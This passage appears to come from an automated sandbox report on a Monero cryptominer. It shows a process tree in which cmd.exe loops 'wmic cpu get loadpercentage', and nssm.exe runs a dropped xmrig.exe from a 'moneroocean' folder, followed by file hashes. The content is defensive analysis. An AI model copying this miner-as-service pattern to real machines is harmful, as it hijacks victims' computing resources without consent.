C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4720
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3748
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2340
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1808
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3308
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:236
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:700
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4916
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4664
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3348
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3596
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5016
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:752
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1460
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2956
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2748
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2848
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1520
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2372
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4708
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2820
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1924
-
-
-
C:\Users\Admin\moneroocean\nssm.exeC:\Users\Admin\moneroocean\nssm.exe1⤵
- Executes dropped EXE
PID:2984 -
C:\Users\Admin\moneroocean\xmrig.exe"C:\Users\Admin\moneroocean\xmrig.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4380
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD571de3d4e6a902c41e5d87b031a5a1910
SHA138da8e3af858eb6ad51af0aca573ed73c244cb21
SHA25619c786a0d1be5f808940dfb0bfcdf3e78a1e4881cb326fabe044b9c7c2970466
SHA512c3811686eead6874ad81483349e693e1ba89ef4c38d001cfdc5e49c5085d13649940a623a2e3cfd12d3ff887e6d12c11b3a832b09e00577d623cf4d7c03f7554
-
Filesize
1KB
MD5911bd9bdb9131b532f635262911c27a5
SHA1678d9547d74085bda30bb70ca0623e9e78801bb0
SHA256941ead066acf4ebe2d6d53c5076f5e73dd5ccb3266b1fa285bf503901c30702b
SHA512def0f5c2ae45a7fa2d2fb8cef94ec8cee6cb7ec8bcde16b3c9c1fcd88d92f60ebab8999e32171bf519aa2a9995b47b2bed218fb00fcd19321f6528b6462724a8
-
Filesize
1KB
MD5b1929c9c344d55286352a1a9e6f96712
SHA197104cbd98955f794dcaf09ce2268cd3c9d6d896
SHA25688b8a5b60a583e5d062cae8b03261a567ff5f59cd275ff86e4d4b1ad8e1066b6
SHA512d95ca2f99272e515d4cd0f630307f0d35762831917c431b3b339c6e251559c5044f81c079c53a554f5d4019a67868d2c825b06ebd3fbf4d46ace6fd1cb7a45d5
-
Filesize
1KB
MD56acd35ff5ad9e86aaf6deaf1da70e985
SHA15a6347a6930d2dd5fd3fe68999ec9b38409686de
SHA256e5c18c93079774eaaa6f09bdfaa5adc4ccda1e51366c3aec4409055efc581696
SHA512ebe5dca53b5880b112b29c982c1e9df5e9ee62e02f5127002df93765b1ed07bac39f3b4b67ad9aa858bc8fcb1adc1a6c7f6406bed88ee6f906d803869edf4529
-
Filesize
1KB
MD5ca349e7afcef99b086efd21d52fd7f52
SHA195599f0b6751f7acafe746529562bb7fb717aa8c
SHA256f511a4a2c400f29e5bc24b342443ffe95db77aab43e9ca62fd59aa3975a68989
SHA512dd6ef61baf3994485c3f47869a9ccaba2dc0410983146739fa689803b108fde1747d8f25c107c91043b69164a95328c3d55a07e1f3ac3f799c145968ba0bbccc
-
Filesize
1KB
MD5f1efafb5f7f835a5bb79d64d7600ec0c
SHA194400220a62569b4f2c07ea1fa31fac4b013875d
SHA256d45a9cc457f68e170cc843424bbac51304fb7201ba43cb64ce0723e97d8f07e8
SHA51239b51da133641a78e777c9ce9026874e4f0d4bacef539d4a7df3dc75f0b6406c9efa706dd1a69a81aad846a81b4310c1bb387bb8f698ea3ace7060a9e7fc3c0b
-
Filesize
1KB
MD5f0f615e3a7dc9890b80651b49f2cda22
SHA1d6b31ce1d63e7dbca1e271f08532b13b3ff8d2cd
SHA2568c1c0d0baedcf8905b560a4fc4c8315f29279fb42bd5edf5f2973c736997f790
SHA512178ac90cc0aeac4e6a518aede0d79bb091cb9e2836d9b2941ad2df64d64a5faf19133a58c286985eb848f9bae13e3ebe08d1967432ffe3975ec8407d3ea8ee04
-
Filesize
1KB
MD53f40d651f2dcf866a02a27bd227ca4ee
SHA1a9e6a4b46d40bd28e18e093a89a8d44b3df321d7
SHA2566977cb39ce8bbebd2cee5cbbb4a55aef8f424f5d7b3e461b7ecfea5c285b0a84
SHA51215809990ad18189c8283ce573312efb7269a464e88697e4c2f0f140d322bca0a9ee5d83dc62c6b1effe72c031682f76835029080caa6d9cf775a70e84009c57f
-
Filesize
1KB
MD58558bb37a37a92e0363e766c41d2bc25
SHA1b9c23a0837c0f196e84ca32a1eeeb9b1bd3235de
SHA256576d44077855f73f0772834f21ac78dd077351454b8d5da171d2cdfc2d1595a5
SHA512f8fbee69b4b614cd0538970e8148709fceb37728be7fa1e00d45d68b0ed76aadb30be95f09c21a127bb6aa4a7ac0a54e8b7fbdba88932beafb15c927d4028a83
-
Filesize
1KB
MD54338fc72e39eaddb43a21a62e7764a57
SHA1d4bdb16dcda6d517f0e7cfd420bc3807c1a802f8
SHA25603ab0afe61f8f9f40713cc56f3489d7660f90863286033197fbfb7953eab31d5
SHA5126da5d8a9ee12a91c766d506f791bd857b7e0aeb7bb9833f4732e1b0238793ad0e5e41ef3e48e65fd710ab0977fddeb0bb22ee5a5b80cbea8091223529e75c385
-
Filesize
1KB
MD5969a07b130e6a24f99837abfaae8e214
SHA1e866d389bcf06f56d2effdcea067c8b9c023ccc1
SHA2566b336495061db3fe203263fb1a96b43f87a4aa1d494e7337e4e552218152203a
SHA512e799b27ad1a5ba0cfa6be8a190f5b85ed1e19850289adb653ae3ef6524790fb7e0f5c99470043481702bd81715b97aed5daa3b3538dcb008c3fbe7000a35748e
-
Filesize
1KB
MD52f2704ae9f4f5d160216f142d778364a
SHA1d1222b4d4e3998ac61fe8dd3439d5ae629970d5d
SHA256bca67ac5496b7a173288853520435b61dc39d7c5c9690e97453e3644d4a3b4af
SHA512b233cc4dfd49f1f89c4ab64f78b389b296ea81bf8e1128bdc928dbd75904e49f5a9b4f827bea4f91e3c4a2cfd7ca0e2fc01b585d5ac164a6d7f0a63a420ce9ae
-
Filesize
64B
MD535dd3730b23cb4cf6393f2b6deef9084
SHA136f247cb44e9874b44bc84d7657dc7e6ff8aaa74
SHA25657691d7e9a2868fd2fcbc3fb4eb57890e66f9bd172560787788eaff9637da9ca
SHA5123ac122561dc8dd6379fc4c75cf52793d27e80eab3af4fd80bf7ce1e8ab39b7f9032ac65aa45ee32788367dc90b5f216532b372cd1e85bb9801749321086c3823
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
556B
MD5889ed31bd87dcdd18996201e93fca965
SHA1bebcb6fa0d36fabc6edc469cc3177251bd50dbb8
SHA2566fd0f837746697ef471db89d8fa9290114c4c2dd416020f5ad9dc1837fb16ee7
SHA51211e131928d8a7fd30b20943aeda62a9185b9b961fc577a75a6de87635b5a89a13fcbbfbbf0abd8e6a5cdc3052ef98c40bbebb33252ec00e73fcf18debda10f0a
-
Filesize
14KB
MD5623f6006f683afdb4b7406e3a4ec35bf
SHA1f63f03d7338317224726eba368f1a045fa2142d7
SHA25621d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b
SHA512df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab
-
Filesize
2KB
MD5725d38d9eeadc9c2691063936b01f9ec
SHA1153fd5bd55cfd845516562291a7ab867d68145b5
SHA2560df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43
SHA512fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658
-
Filesize
2KB
MD5f349e8d511042f245efffe900ae351c0
SHA1e136582c71527dad3cc7e213498424c901cff140
SHA2563678afd2d5f79c71e74519d3ebc78135bbf7f53083d69c7f7befce0c1628b3b7
SHA512e66f7f343540d0e3ae009cde7af4a4aa83cbd8cf4371b81e6417af4cedf69c46f257f0f45c1017d6531189fcebe7632fd171b83048d8eff1f2cee56119349745
-
Filesize
2KB
MD515c5b4aa00f4ef2fe9c95cf45170fa3f
SHA16c941573df12081a03467b25bb7feb36a03a7bd7
SHA256b49570289502f57453863c9932c4a58b62b0c3ecb1c4edda466f90c7518385e8
SHA512b9e449efc978be9d186b6b4de9a960bac9de69d3591692716677b54f17b1f4494fc6b90cff4d202408ec452b9a9935628b5ea2f8f5aca33a383024c2ec1642c7
-
Filesize
2KB
MD5d4f8a13f8c90e2b3b2e7d30a553df39c
SHA15c5303ef682ffcd31e57d1abd900ba5b637d51e4
SHA256f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a
SHA51268b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd
-
Filesize
2KB
MD5c9ef9c214996db3d88f571226910c5d5
SHA1420ba30247b1e09f706557a7704a1ebee5d3165c
SHA256fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1
SHA512de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d
-
Filesize
2KB
MD5cebda58599b68554ac205e498285bdd2
SHA1dbf337b5d339274076e273fe182042860248afe0
SHA256f291ebc12891de9cf7f5335491ac32be0c4f3a8d2e1e4e73ec924f8304ea5b8c
SHA5120721beeca4ac2a7c7eb1ccbe23dc12e0c1a1661c6195caf028592d9bdf4bd2f58832c3530c6bea7b3408f13592780d2c8333d619f2b752fb84d7ab95a0ec6d14
-
Filesize
360KB
MD51136efb1a46d1f2d508162387f30dc4d
SHA1f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA51243b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5
-
Filesize
9.0MB
MD59ee2c39700819e5daab85785cac24ae1
SHA19b5156697983b2bdbc4fff0607fadbfda30c9b3b
SHA256e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3
SHA51247d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649
-
Filesize
135KB
MD57ad31e7d91cc3e805dbc8f0615f713c1
SHA19f3801749a0a68ca733f5250a994dea23271d5c3
SHA2565b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201
SHA512d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260
-
Filesize
3.5MB
MD5640be21102a295874403dc35b85d09eb
SHA1e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4
SHA256ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b
SHA512ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e